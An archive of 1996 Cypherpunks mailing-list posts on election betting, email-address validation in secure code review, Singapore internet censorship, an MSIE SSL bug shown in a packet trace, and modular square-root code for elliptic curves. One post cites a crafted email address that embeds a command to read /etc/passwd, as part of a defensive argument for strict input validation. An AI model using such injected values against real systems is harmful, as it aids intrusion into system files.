Indeed. Also, a prominent candidate (this time) told devotees (last time)
to give wrong answers to pollsters when called. While it's still possible,
this behavior is much less likely with real money (though with his kinda
dough, distortions would be possible for him -- & profitable for others).

>Other issues:
>
>Percentage of popular vote to Dem candidate: 47
>"               "             Rep    "     : 44
>"               "             Other  "     : 12
>
>Note that there may be an opportunity for arbitrage when numbers don't add
>up to 100;

Last time there was supposedly an arbitrage opportunity between odds in
Moscow and those in London [Now THAT'S my kind of bet;) -- I can't lose]
according to a W$J article on the subject from years ago. 20 minutes on
Alta Vista this morning reveals nothing like this available, Ladbroke's
links are hardly there, and I don't know the names of any other bookies
in London, or any at all in Moscow. The closest thing was a (braindead)
"George" magazine article and a few sites lamenting the lack of possible
Presidential gambling. AV didn't even reveal the confusing US university
site where some gambling is (or was) going on. Perhaps English c-punks
can help us on the odds for all candidates, including the longshots. I
think publicity from freeing up this information might be more favorable
than publicity about things like porn or Assasination Politics, and the
process of setting up a site that reveals the odds in semi-realtime from
London/Moscow should not be too difficult, especially if actual gambling
is not conducted on the site.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Fri, 30 Aug 1996 02:43:31 +0800
To: ichudov@algebra.com
Subject: Re: Code Review Guidelines (draft)
In-Reply-To: <199608291458.JAA28369@manifold.algebra.com>
Message-ID: <199608291624.LAA07221@homeport.org>
MIME-Version: 1.0
Content-Type: text


Igor Chudov @ home wrote:

| The decision that have just made is not a technical decision, it is 
| a business decision. You just decided that the needs of security 
| outweight the need to be able to deal with 100% of potential customers.

	You're mostly right.  (I happen to know that we're expecting
all customers to have IP based connectivity for the suite of
applications these guidelines are being written for, but you're right
that this is a business decision).

| For example, suppose that you wrote your report for Gizmo International, 
| a company that sells a variety of widgets and gadgets to users in the
| world. Their current setup is that the users can visit www.gizmo.com
| and ask the server to send them notifications about new products.
| 
| Based on your report's suggestions, Gizmo will have to cut off
| all users with x.400 mail addresses, all UUCP users with bangs in their
| addresses, all people with funky addresses provided by SPRINT, 
| and so on. For example, my moderation bot received a message
| from the following person:
| 
| From: /G=JAMBYL/S=KIWANIS/O=CUSTOMER/ADMD=KAZMAIL/C=KZ/@gateway.sprint.com
| 
| (my eyes just popped when I saw such address)
| 
| There are a lot of international people using this sprint gateway.
| 
| This would potentially represent a loss of s significant number of 
| customers who will be bitching about gizmo.com to all their friends.
| This is a bad decision from the marketing standpoint.
| 
| I see this as a compelling reason to allow all possible email addresses
| to be processed correctly, even if it means that there is more work
| for code proofreading. At least the management responsible for
| marketing must understand and approve your email handling guidelines. A
| computer programmer cannot make such decisions himself.

	You're again correct; the document is undergoing review
internally.  May I have permission to quote you?  I'm a big advocate
of open debate when things are in a draft stage.

	Also, there are issues of what happens if an unusual address
gets past the firewall and mishandled by some legacy code.

Adam

| igor
| 
| 
| Adam Shostack wrote:
| > 
| > Igor, and many others who commented on the fact that many characters
| > are legal in email are correct.  However, with the exception of '-'
| > and '+', I'm not sure if I'll be changing the body of the guidelines.
| > My issue is that dealing with a wide variety of characters that are
| > legitamate, such as "cat ../../../etc/passwd"@foo.com is more
| > dangerous than only accepting the common case of user@host.net.
| > 
| > The number of addresses such as harvard!adam is dropping as the number
| > of 'normal' addresses grows.
| > 
| > 
| > Igor Chudov @ home wrote:
| > | Adam Shostack wrote:
| > | > http://www.homeport.org/~adam/review.html
| > 
| > | In part " V.Code (Security Issues)/3.Data Checking" you say the following:
| > | 
| > | `` Data coming in to Acme Widgets should be checked very carefully for
| > |         appropriateness. This check should be to see if the data is what
| > |         is expected (length, characters). Making a list of bad
| > |         characters is not the way to go; the lists are rarely complete.
| > |         A secure program should know what it expects, and reject other
| > |         input. (For example, if you are looking for an email address,
| > |         don't check to see if it contains a semi-colon or a newline,
| > |         check to see if it contains anything other than a [A-Za-z0-9._]
| > |         followed by an @, followed by a hostname [A-Za-z0-9._].)''
| > | END QUOTE
| > | 
| > | That is not entirely correct. An email address is much more than
| > | that, it can contain "!", several "@" characters (not next to each other
| > | though), "%", and so on. x400 mail addresses (?) can contain "/", "=",
| > | and all emails can have "+" and "-" and "_" in them. 
| > | 
| > | Some of the valid email addresses are
| > | 
| > | user_name@company.com
| > | alex+@pitt.edu
| > | mi%aldan.UUCP@algebra.com
| > | user%host.domain@anon.penet.fi
| > | host1!host2!user
| > | 
| > | Look at your sendmail.cf file for a humongous amount of 
| > | email parsing rules.
| > | 
| > | Thanks for an excellent document though, I put a link to it from my
| > | intranet page.
| > 
| > 	You're welcome.
| > 
| > | 	- Igor "Code Obscurity Creates Job Security" Chudov.
| > | 
| > 
| > Adam
| > 
| > -- 
| > "It is seldom that liberty of any kind is lost all at once."
| > 					               -Hume
| > 
| 
| 
| 
| 	- Igor.
| 


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robb@SpeakOut.org (Robb Hill)
Date: Fri, 30 Aug 1996 02:37:08 +0800
To: cypherpunks@toad.com
Subject: Re: Stego Virus
Message-ID: <v01540b00ae4b7512cc3d@[206.66.171.67]>
MIME-Version: 1.0
Content-Type: text/plain


For a virus (a program) embedded in a .gif file to affect you, it would
have to unsteg and then run.  Just dont run it it you unsteg it.


Robb Hill
National Association for Home Care
228 7th Street SE
Washington DC 20003

202-547-7424
202-547-9312 fax
robb@speakout.org






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@eff.org>
Date: Fri, 30 Aug 1996 05:49:57 +0800
To: cypherpunks@toad.com
Subject: Singapore Global Action Alert (8/29/96)
Message-ID: <Pine.SUN.3.91.960829113101.14221C-100000@eff.org>
MIME-Version: 1.0
Content-Type: text/plain





August 29, 1996

                          *** GLOBAL ACTION BRIEF ***

*	Please redistribute this document widely with this banner intact
*	Redistribute only in appropriate places & only until 30 September 1996

Singapore Government Curtails Online Freedoms

The government of Singapore recently established strict controls on all
Internet Service Providers and many World Wide Web pages. ISPs and content
providers will be licensed, and required to adhere to a rigid set of content
guidelines which apply to political speech, ethnic and religious remarks
including satire, and public morals including "contents which propagate
permissiveness or promiscuity."

We believe that the licensing policy and broad content guidelines will
effectively chill the free flow of information not only in Singapore, but
worldwide.  Because the Internet is global, transcending geographical
bounds, we are convinced that censorship within any nation or state, whether
implicit or explicit, poses a threat to all users of the global network.  We
therefore encourage the government of Singapore, and other governments
implementing or considering policies of content control, to stress education
rather than regulation.

Singapore's approach, like the Communications Decency Act that was passed
but quickly rescinded in the U.S., applies a broadcast regulatory standard
to the Internet.

The application of broadcast-inspired, "one-to-many" regulation to this new
*many-to-many* medium indicates a fundamental misunderstanding of the nature
of the Internet.

Unlike television and radio broadcasting, the Internet does not push
material at the viewer, but simply makes material available on demand - not
unlike a rapid inter-library loan.  And unlike broadcasting, the Internet
does not present the views of a limited few privileged speakers, but allows
all participants to publish, comment on, and even refute, what they read.

Recognizing that every culture has its own standards regarding what is or is
not appropriate, the undersigned organizations recommend that Singapore's
government allow its citizens to use Internet filtering  tools, with which
they can block out any material that is offensive to them, rather than
embark upon a closed-border approach that will cut Singapore off from the
new global online library.

Support of individually customizable filtration services, instead of a broad
top-down censorship effort, would enable Singapore to participate in a  more
positive and effective way in the evolution of this new open medium, and
would indicate trust in the ability of Singaporeans to choose what is right
for Singapore and for themselves.

***

WHERE TO FIND MORE INFORMATION

For more information on the Singapore censorship situation, and other global
efforts to abridge the flow of information over the net, see these web sites:

http://www.eff.org/~declan/global/index.html
and
http://www.io.org/~sherlock/doom/threat.html

Human Rights Watch's letter to George Yeo, Singapore Minister for
Information and the arts, is located on HRW's gopher, at
gopher://gopher.igc.apc.org:5000/00/int/hrw/asia/asia/4

WHO TO CONTACT

The following organizations have issued this advisory:

ALCEI - Electronic Frontiers Italy * 
   http://www.nexus.it/alcei.html
American Civil Liberties Union (ACLU) *
   http://www.aclu.org
Center for Democracy and Technology (CDT) *
   http://www.cdt.org
CITADEL-Electronic Frontier France * 
   http://www.imaginet.fr/~mose/citadel
EFF-Austin * 
   http://www.eff-austin.org
Electronic Frontiers Australia * 
   http://www.efa.org.au
Electronic Frontier Canada * 
   http://www.efc.ca/
Elektronisk Forpost Norge (Electronic Frontier  Norway) * 
   http://www.sn.no/~efn
Electronic Frontier Foundation * 
   http://www.eff.org
Electronic Privacy Information Center (EPIC) *
   http://www.epic.org
HotWired * 
   http://www.hotwired.com
Voters Telecommunication Watch (VTW) * 
   http://www.vtw.org

Please choose an organization above and visit their web site for contact
information.

A copy of this advisory is available on the World Wide Web, at
http://www.well.com/~jonl/singapore.html.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: robbhill@southwestpaper.com (Robb Hill)
Date: Fri, 30 Aug 1996 02:44:49 +0800
To: cypherpunks@toad.com
Subject: see you guys later
Message-ID: <v01540b02ae4b77865fbf@[206.66.171.67]>
MIME-Version: 1.0
Content-Type: text/plain


This list used to focus on privacy issues, crypto protocols, algorithms,
national crypto policy, etc.  I saw the Netscape cracks announced here, I
saw squeamish ossifrage here, now I see nothing of the sort.  Now I see
that people are discussing heckling the pres., black helicopters???.  I
have heard Phil Zimmerman frequently call Paul Zimmerman.

See you guys later.


Robb Hill
National Association for Home Care
228 7th Street SE
Washington DC 20003

202-547-7424
202-547-9312 fax
robb@speakout.org






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Fri, 30 Aug 1996 05:46:45 +0800
To: "John Hemming - CEO MarketNet"  <cypherpunks@toad.com
Subject: Re: MSIE cryptography
Message-ID: <199608291838.LAA27579@netcom8.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  3:20 PM 8/29/96 +0000, John Hemming - CEO MarketNet wrote:
>Essentially, however, I do not think it is right for a program to display a
>locked key regardless of any other issues if the data being transferred
>is not encrypted.

I fully agree.  I wonder if the FTC is interested.


-------------------------------------------------------------------------
Bill Frantz       | Cave ab homine unius lebri | Periwinkle -- Consulting
(408)356-8506     |  [Beware the man of one    | 16345 Englewood Ave.
frantz@netcom.com |   book]  - Anonymous Latin | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Remo Pini <rp@rpini.com>
Date: Thu, 29 Aug 1996 20:43:02 +0800
To: whgiii@amaranth.com
Subject: Re: In reference to comments made to me and to the Group
Message-ID: <9608290955.AA28509@srzts100.alcatel.ch>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

To: cypherpunks@toad.com, whgiii@amaranth.com
Date: Thu Aug 29 11:53:46 1996
I kind of like this valid discussion going on. PERIOD. But I believe that 
although there's something (maybe, maybe not) politicians (be they 
Protestant, Palestinians or from Dresden) might find a misdemeanor, one 
shouldn't boast with possible unwarranted encryption.

No, seriously, your arguments tend to be belittled by your spelling. (Maybe 
you should get Pronto Secure, it has a spellchecker included)

BTW, I don't get paid by Commtouch for writing that (SNIF!).


A quick overview: beleive, politions, disscusion, orginised,
                  sponcered, orginization, wekness, vailid, Dresdin,
                  durring, expantion, Prodistant, Palisinians, 
                  unwarrented, PEROID, somthing, mistamener, mabye,
                  mabye not, possiable, encyrption, disscussing, bost

I hate teachers and people who show of with their spelling (and I'm a split 
personality). Yeah, me too.

- ------< fate favors the prepared mind >------
Remo Pini                        rp@rpini.com
PGP:  http://www.rpini.com/crypto/crypto.html
- ----< words are what reality is made of >----
-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQEVAwUBMiVoqxFhy5sz+bTpAQFYUgf/eu+dQvQALz7Of3DCWLoBWVICY2fmnDJB
tQcHTNbuPXybjACVq8+LxdKT2wjXzuU401/rv4dW5+LgrMRlKMIhjx8xAIKSKBOg
VBb2ruV9SG2/+sY0iYzJY1Dz4opf5c9aCLgN5ptM2LeWyWOtK71VtV8ASDaoGBP7
HIs9jVJ3sbyQaf8CPfR+pEQSjGLHCm8QshazSjPvuUdIRxB5f9Etpy+45vK4FVPP
EXWYaN3jTBOPC24Qe8qGs+Dn/9C5ZR9y0Y2edv/XzWDZrdg951lSdQKxca4wtCbD
nyKQ/R86wvfy65uwrBDzUSFupuA1M8TcF63ncybQ/316cHl8x/z0rA==
=musf
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bruce M." <bkmarsh@feist.com>
Date: Fri, 30 Aug 1996 04:24:30 +0800
To: cypherpunks@toad.com
Subject: Re: In reference to comments made to me and to the Group
In-Reply-To: <199608290618.XAA12301@mom.hooked.net>
Message-ID: <Pine.BSI.3.91.960829122154.25708A-100000@wichita.fn.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 28 Aug 1996, Institute for Security and Intelligence wrote:

> I'm not looking for opinions on politicians, the government, etc., 
> nor do  I care what you think of me or my views.  However, if you can 
> put  some _solid_ thoughts into bullet items, or any other format you 
> deem useful, perhaps we can move forward.
> 
> Ideas.  Actions.  No commentary, raves, rants, flames, or other bandwidth wasters.
> 
> Let's see what we come up with.

    So what you're saying is that you now realize what a bunch of garbage 
you were spouting and want people to let you know the facts?

                       ________________________________
                      [ Bruce M. - Feist Systems, Inc. ]
                       ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
     "Official estimates show that more than 120 countries have or are 
      developing [information warfare] capabilities." -GAO/AIMD-96-84
                         So, what is your excuse now?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: acain@ncsa.uiuc.edu (Adam Cain)
Date: Fri, 30 Aug 1996 05:12:38 +0800
To: cypherpunks@toad.com
Subject: Announce: NCSA HTTPd 1.6b1 and XMosaic 2.6s_b1
Message-ID: <9608291727.AA20511@void.ncsa.uiuc.edu>
MIME-Version: 1.0
Content-Type: text/plain



Hiya!

This is to announce the availability of NCSA HTTPd version 1.6b1.
It is accompanied by a version of XMosaic (2.6s_b1) which can be 
used for testing the security features.

To participate in the beta testing effort, please see

   http://hoohoo.ncsa.uiuc.edu/beta-1.6/


What's New:
----------

The main difference between 1.6b1 and 1.5.2 is the addition of
support for the following security protocols:

-- Secure-HTTP (version 1.1)
-- SSL versions 2.0 and 3.0

XMosaic 2.6s_b1 supports these protocols as well.


Motivation:
----------

We recognize that there are many fine web servers availble on the 
Internet, some even for free.  In releasing NCSA HTTPd 1.6b1, we are 
niether trying to 'outdo' other server development efforts, nor are we 
expecting to provide a server which will meet all possible needs.  
Rather, we wish to follow through on our commitment to making novel 
features available for experimentation and testing.  The capability
of performing digital signature-based authentication (via S-HTTP in
1.6b1) is an example of a feature we see lacking in the Web today.


Obtaining HTTPd 1.6b1:
-----------------------

Currently, HTTPd 1.6b1 is available in binary form to registered,
domestic users.  An exportable version will be available eventually,
and we will announce its availability by the same means.  To register
for beta testing 1.6b1, please go to the URL given above, and select 
the "register here" link after reading the page.

The documentation (under construction) for this release is available at

   http://hoohoo.ncsa.uiuc.edu/docs-1.6/

The HyperNews page (good for bug reports, questions, discussion) is at

   http://union.ncsa.uiuc.edu/HyperNews/get/www/ncsa-httpd/1.6/beta.html

Administrative requests may be directed to httpd-beta@ncsa.uiuc.edu.


Thanks,

	Adam Cain
	acain@ncsa.uiuc.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "John Hemming - CEO MarketNet"  <johnhemming@mkn.co.uk>
Date: Thu, 29 Aug 1996 23:24:38 +0800
To: cypherpunks@toad.com
Subject: Hmmm MSIE V2.0
Message-ID: <1996-Aug29-122751.1>
MIME-Version: 1.0
Content-Type: text/plain


It seems to be that MSIE V2.0 transmits its data in the clear once it has
transmitted the client hello and received the server hello SSL records
in some limited circumstance or other.

I don't know how widely this bug exists.  Neither do I know which versions
other than the French one has it.  However, if you point your version
of MSIE at

https://beta.mkn.co.uk/help/system/msie

and it indicates that the client has encryption problems.
Then you have that problem as well.  I would watch this one.

Anyone feeling like tracing the packets will find it easier to crack than
2 bit SSL. (let alone 40 bit or 128 bit).

Any thoughts?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Barry C. Collin" <isi@hooked.net>
Date: Fri, 30 Aug 1996 06:41:52 +0800
To: whgiii@amaranth.com
Subject: CyberTerrorism Thoughts
Message-ID: <3225F0D7.3337@hooked.net>
MIME-Version: 1.0
Content-Type: text/plain


Dear Mr. Geiger:

Thank you for your very well-thought-out presentation.  That is 
precisely the kind of material we need to see more of in this forum.  
It's tough to write, but it's worth it.

>From the feedback I've received, I should make this clear: regardless of 
criminality issues, I do not consider hacking in to a system to view 
things an act of terrorism (by classical or other definition).  My 
concern, by far, is the fragility I've found with systems connected to 
physical processes -- processes that affect the physical world.

Your segmentation of motivation and actions was excellent.  I look 
forward to your future commentary and postings.

Also, although it is sometimes difficult (myself no exception), I think 
you'd agree that this factual, non-flame approach gets far more work 
done.  Your response in that manner was appreciated.

Regards,
Barry C. Collin
-- 
Institute for Security and Intelligence
A Non-Profit Research Institution
P.O. Box 9877
Stanford, California  94309-9877  USA




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Fri, 30 Aug 1996 07:37:26 +0800
To: Tom Rollins <trollins@interactive.visa.com>
Subject: Re: Elliptic Curve Y**2 = x**3 + a * x**2 + b
In-Reply-To: <199608291905.PAA16350@rootboy.interactive.visa.com>
Message-ID: <Pine.SUN.3.95.960829124919.16763B-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 29 Aug 1996, Tom Rollins wrote:

> Questions are:
> 
>   1: How can I take the suqare root mod p ?

Here's some C++ code for taking modular square roots:

Integer ModularSquareRoot(const Integer &a, const Integer &p)
{
	if (p%4 == 3)
		return a_exp_b_mod_c(a, (p+1)/4, p);

	Integer q=p-1;
	unsigned int r=0;
	while (q%2==0)   // while q is even
	{
		r++;
		q >>= 1;
	}

	Integer n=2;
	while (Jacobi(n, p) != -1)
		++n;

	Integer y = a_exp_b_mod_c(n, q, p);
	Integer x = a_exp_b_mod_c(a, (q-1)/2, p);
	Integer b = (x.Square()%p)*a%p;
	x = a*x%p;
	Integer tempb, t;

	while (b != 1)
	{
		unsigned m=0;
		tempb = b;
		do
		{
			m++;
			b = b.Square()%p;
			if (m==r)
				return Integer::ZERO;
		}
		while (b != 1);

		t = y;
		for (unsigned i=0; i<r-m-1; i++)
			t = t.Square()%p;
		y = t.Square()%p;
		r = m;
		x = x*t%p;
		b = tempb*y%p;
	}

	assert(x.Square()%p == a);
	return x;
}

>   2: How to determine if a solution exists for a
>      selected value of x ?

The Jacobi symbol tells you whether x has a square root mod p:

// if b is prime, then Jacobi(a, b) returns 0 if a%b==0, 1 if a is
// quadratic residue mod b, -1 otherwise
// check a number theory book for what Jacobi symbol means when b is not
// prime

int Jacobi(const Integer &aIn, const Integer &bIn)
{
    assert(bIn[0]==1);

    Integer b = bIn, a = aIn%bIn;
    int result = 1;

    while (!!a)
    {
	unsigned i=0;
	while (a[i]==0)
		i++;
	a>>=i;

	if (i%2==1 && (b%8==3 || b%8==5))
		result = -result;

        if (a%4==3 && b%4==3)
            result = -result;

        swap(a, b);
        a %= b;
    }

    return (b==1) ? result : 0;
}

>   3: Is the a simpler method than find a square root ?

I don't think so.  Let me know if you do find one.

Wei Dai





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "John Hemming - CEO MarketNet"  <johnhemming@mkn.co.uk>
Date: Fri, 30 Aug 1996 00:19:13 +0800
To: cypherpunks@toad.com
Subject: MSIE cryptography
Message-ID: <1996-Aug29-132502.1>
MIME-Version: 1.0
Content-Type: text/plain


Just downloaded the most recent English Version 2.1 for Windows 3.1.
This does appear to do the same in terms of no encryption at all after
the server hello.

To be fair to Microsoft the number of cycles performed for the private key
echange is quite high.  Therefore, not having any key and not doing the
RSA calculations makes the access quite a bit faster.

The older versions (and some Win95 versions) that we have found around
seem to just crash our server.  I am not really feeling like debugging that.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jbugden@smtplink.alis.ca
Date: Fri, 30 Aug 1996 05:12:52 +0800
Subject: RE: Desubscribe
Message-ID: <9607298413.AA841352799@smtplink.alis.ca>
MIME-Version: 1.0
Content-Type: text/plain



perry@piermont.com wrote:
>MrAdvent@aol.com writes:
>> I would like you to desubscribe me from you mailing list
>
>I refuse.
>
>.pm

Lets face it. It's not a lack of volition, it is a lack of ability. Perry
couldn't desubscribe MrAdvent@aol.com even if he wanted to.

I can't unsubscribe myself even when I follow the instructions.

When I send an e-mail, the header contains two equivalent addresses:
jbugden@smtplink.alis.ca and jbugden@alis.com.

Unfortunately, there is some logic in majordomo that is not symmetric so that
while I can subscribe as jbugden@alis.com, I can not unsubscribe since majordomo
notices jbugden@smtplink.alis.ca in the header and treats the attempt to
unsubscribe as a forgery.

So get used to it MrAdvent. After a few months you may even enjoy the ramblings
of the many too pale souls swimming in this communal cesspool. 

You can unsubscribe any time you like, but you can never leave.

James






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bf578@scn.org (SCN User)
Date: Fri, 30 Aug 1996 08:08:16 +0800
To: cypherpunks@toad.com
Subject: Re: Small German bank claims first with online service
Message-ID: <199608292121.OAA06520@scn.org>
MIME-Version: 1.0
Content-Type: text/plain


>
>		 
>>	 FRANKFURT, Aug 28 (Reuter) - German private bank Gries &  
>>Heissel Bankiers on Wednesday launched an Internet banking 
>>service -- the first comprehensive service of its kind in a 
>>country where online bank options are gradually taking off. 
>>	 The small Berlin-based bank linked up with U.S. computer  
>>firm Hewlett Packard Co to develop the system, which Internet 
>>users can access using a high-security personal code. 

   Sounds scarey and like a challenge!


>>	 Clients will be able to view detailed balances on their  
>>deposit, current and securities accounts and transact all normal 
>>banking business on the World Wide Web. 



--
------------------------------------------
There are no facts, only interpretations.

I always wanted to be somebody, 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bf578@scn.org (SCN User)
Date: Fri, 30 Aug 1996 07:58:51 +0800
To: cypherpunks@toad.com
Subject: the anonymizer
Message-ID: <199608292124.OAA07621@scn.org>
MIME-Version: 1.0
Content-Type: text/plain



Does anybody know if there are any other services like the one at
   http://www.anonymizer.com

  That anonymize your surfing?


--
------------------------------------------
There are no facts, only interpretations.

I always wanted to be somebody, 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "John Hemming - CEO MarketNet"  <johnhemming@mkn.co.uk>
Date: Fri, 30 Aug 1996 02:00:15 +0800
To: cypherpunks@toad.com
Subject: Re: MSIE cryptography
Message-ID: <1996-Aug29-150212.1>
MIME-Version: 1.0
Content-Type: text/plain


>> Just downloaded the most recent English Version 2.1 for Windows 3.1.
>> This does appear to do the same in terms of no encryption at all after
>> the server hello.
>I understand that some versions of MSIE support SSL level 3. SSL3 includes a
>capability to switch 'cipher suites' in mid-session, or pick one at the start of the
>session. One of the standard cipher suites performs authentication, but not 
>encryption. This is consistant with your description.

>Please ensure that the server you are connecting to is not configured for
>authenticate-only. It would be a pity to raise a big ruckus over what may be
>just a mis-configured server.

The server is one which interoperates correctly with Netscape and my
own routines.  It does strike me that this change is potentially the source of 
the bug.  However, to have a "locked" symbol on the bottom right hand
of the display would indicate to me as a user that a secure session has 
occurred.

For SSL devotees the records sent are:

1.  Client hello (from the client)
2.  Server hello (from the server).
3.  Plaintext data packaged up in SSL records from the client.
4.  The client then accepts plaintext data packaged up in SSL records.

SERVER_VERSION_MSB and
SERVER_VERSION_LSB 
indicate version 2 of SSL.

I have not changed the code in any way to deal with version 3 of
SSL making I think the valid presumption that browsers using 3 and
2 should be able to cope with a server using 2.

I shall reboot my system, trace a bit of a session and post that.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: trollins@interactive.visa.com (Tom Rollins)
Date: Fri, 30 Aug 1996 07:13:53 +0800
To: cypherpunks@toad.com
Subject: Elliptic Curve Y**2 = x**3 + a * x**2 + b
Message-ID: <199608291905.PAA16350@rootboy.interactive.visa.com>
MIME-Version: 1.0
Content-Type: text


Hello all,

I have a math question concerning implementation of elliptic
curve systems. In coding some elliptic curve source, I
need to pick a random point on the following elliptic
curve in field F_p where p is a prime number.

       Y**2 = x**3 + a * x**2 + b
       where 4a**3 + 27b**2 is not equal to 0 mod p

In selecting a random point, I pick a random value for
x in the range 0 < x < p, compute the right hand side
of the equation and find myself needing to take the
square root for the two solutions.

Questions are:

  1: How can I take the suqare root mod p ?

  2: How to determine if a solution exists for a
     selected value of x ?

  3: Is the a simpler method than find a square root ?

Thanks for any ideas you may have about this...
-tom





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "John Hemming - CEO MarketNet"  <johnhemming@mkn.co.uk>
Date: Fri, 30 Aug 1996 02:14:30 +0800
To: cypherpunks@toad.com
Subject: Re: MSIE cryptography
Message-ID: <1996-Aug29-152004.1>
MIME-Version: 1.0
Content-Type: text/plain


For the real SSL devotees here are the first three transmissions.

Client Hello
  16.8 1025->443 seq 00000001 ack 00000001 PSH ACK  wind 4096 data 30
80 1C 01 00 02 00 03 00 00 00 10 02 00 80 69 AE
0E F0 FA 2E 01 63 BC 59 AF 0F 1C C1 B1 7B

  16.8 443->1025 seq 00000001 ack 0000001F PSH ACK  wind 5640 data 590
Server Hello
82 4C 04 00 01 00 02 02 2E 00 03 00 10 (cert starts) 30 82 02
2A 30 82 01 93 02 05 26 FB 85 54 3F 30 0D 06 09
big snip of server hello (of the certificate)
CC 1F BC A8 9C D7 47 41 D2 33 27 (cert has ended) 02 00 80 4A E7
13 36 E4 4B F9 BF 79 D2 75 2E 23 48 18 A5

  16.9 1025->443 seq 0000001F ack 0000024F PSH ACK  wind 4096 data 333
Client Master Key should be here, but instead we get
81 4B 47 45 54 20 2F 20 48 54 54 50 2F 31 2E 30
          G   E   T   sp  /  sp  H   T  T  P  /    1   .     0

0D 0A 41 63 63 65 70 74 3A 20 2A 2F 2A 2C 20 71


Server Hello
82 4C 04 00 01 00 02 02 2E 00 03 00 10 (cert starts) 30 82 02
82 4C - SSL RECORD 
04 - Server Hello
00 - Session ID Hit (no prior session)
01 - Certificate Type
00 - Server Version MSB 
02 - Server Verson LSB  (ie server version of SSL is 2)
02 2E - Certificate length (mainly snipped)
00 03 - Cipher specs length
00 10 - Connection ID length


I think the probability is that the unusual circumstance that causes
what seems clear to me as an error is that the cert is signed by
a CA other than Verisign.

Essentially, however, I do not think it is right for a program to display a
locked key regardless of any other issues if the data being transferred
is not encrypted.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Remo Pini <rp@rpini.com>
Date: Fri, 30 Aug 1996 00:52:04 +0800
To: whgiii@amaranth.com
Subject: Re: Thoughts on CyberTerrorism {per request}
Message-ID: <9608291347.AA06964@srzts100.alcatel.ch>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

To: whgiii@amaranth.com, cypherpunks@toad.com
Date: Thu Aug 29 15:45:06 1996
> The issue of cyberterrorism can be divided into 3 main parts:
> Catastrophic Terrorist Attack
> Major Criminal Attack
> Minor Hacker Attacks
 
> The CyberTerrorist
> The CyberTerrorist/Mad Scientist
> The Computer Criminal
> The Hacker

It seems that you have a very broad view as to what constitutes terrorism. 
According to you, somebody who hacks into a system is a cyberterrorist. It 
seems, that would make a burglar a real life terrorist, too.

So, to state my point: you use the word cyberterrorism in conjunction with 
ALL possible attacks on a system. Did I get that definition right? If not, 
why not?

Greetings,

Remo Pini
- ------< fate favors the prepared mind >------
Remo Pini                        rp@rpini.com
PGP:  http://www.rpini.com/crypto/crypto.html
- ----< words are what reality is made of >----
-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQEVAwUBMiWe5BFhy5sz+bTpAQGf5gf+L6Mkx4rqvdvsWe84j2TzLYaeOpbO7VCe
S1Ia3EC9rByfXK71zmDCWRd7bTdmRULq297dD/Aqr7KWSEEtsBpQCLs8tGiPCV3I
S+M613ud6Uy9QXtIyw14Ao7XILijWUDU2Hdwb5xfmJ/GIIQiZyDjMVLDXABM7rgb
4d+5AP+gh6VTRNqd2LmhwcvhUoupeJ40QxlRyOJ2A4ZNT7xaS7shUPnbS5kcuSrF
z27nRmnaPkRmh3VD870OIoTRsWUOIQ9lwUkXrPdly9w8E23FyuXGPEMkW+KdUCNZ
6hI7YYsBnCJjM+aUzq3Ypt/N/iUcbPvKO4T+FtbKJHB15IbtDTUr4A==
=pg+4
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 30 Aug 1996 09:37:33 +0800
To: Duncan Frissell <cypherpunks@toad.com
Subject: Re: Simulations
Message-ID: <199608292256.PAA27056@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:28 AM 8/29/96 -0400, Duncan Frissell wrote:
>At 10:05 PM 8/28/96 -0800, jim bell wrote:
>
>>To me, the most obvious one is GIGO:  Simulations, especially 
>>political/social ones, might depend heavily on assumptions that are 
>>programmed into them.   A trivial, yet interesting example is the computer 
>>game "Sim City" which allowed you to adjust the "tax rate" but problems 
>>always cropped up the further away you were from 7%.   The libertarians were 
>>frustrated that we were unable to drop the tax rate and still get a 
>>well-functioning, happy society.  
>
>I was taking economics back in the Armonk Iron days and we played around with
>an economic simulation program written in Fortran.  One was supposed to
>adjust government spending and taxes to find an optimum level.  I set both
>taxes and spending to zero.  We got a lot of economic growth and a lot of
>inflation (this was not a monetarist simulation).

Yes, it does sound a bit inaccurate.  Let's see, while I only took one 
economics course in college (macroeconomics) as I recall inflation is 
generally the product of either the monetarization of the deficit or an 
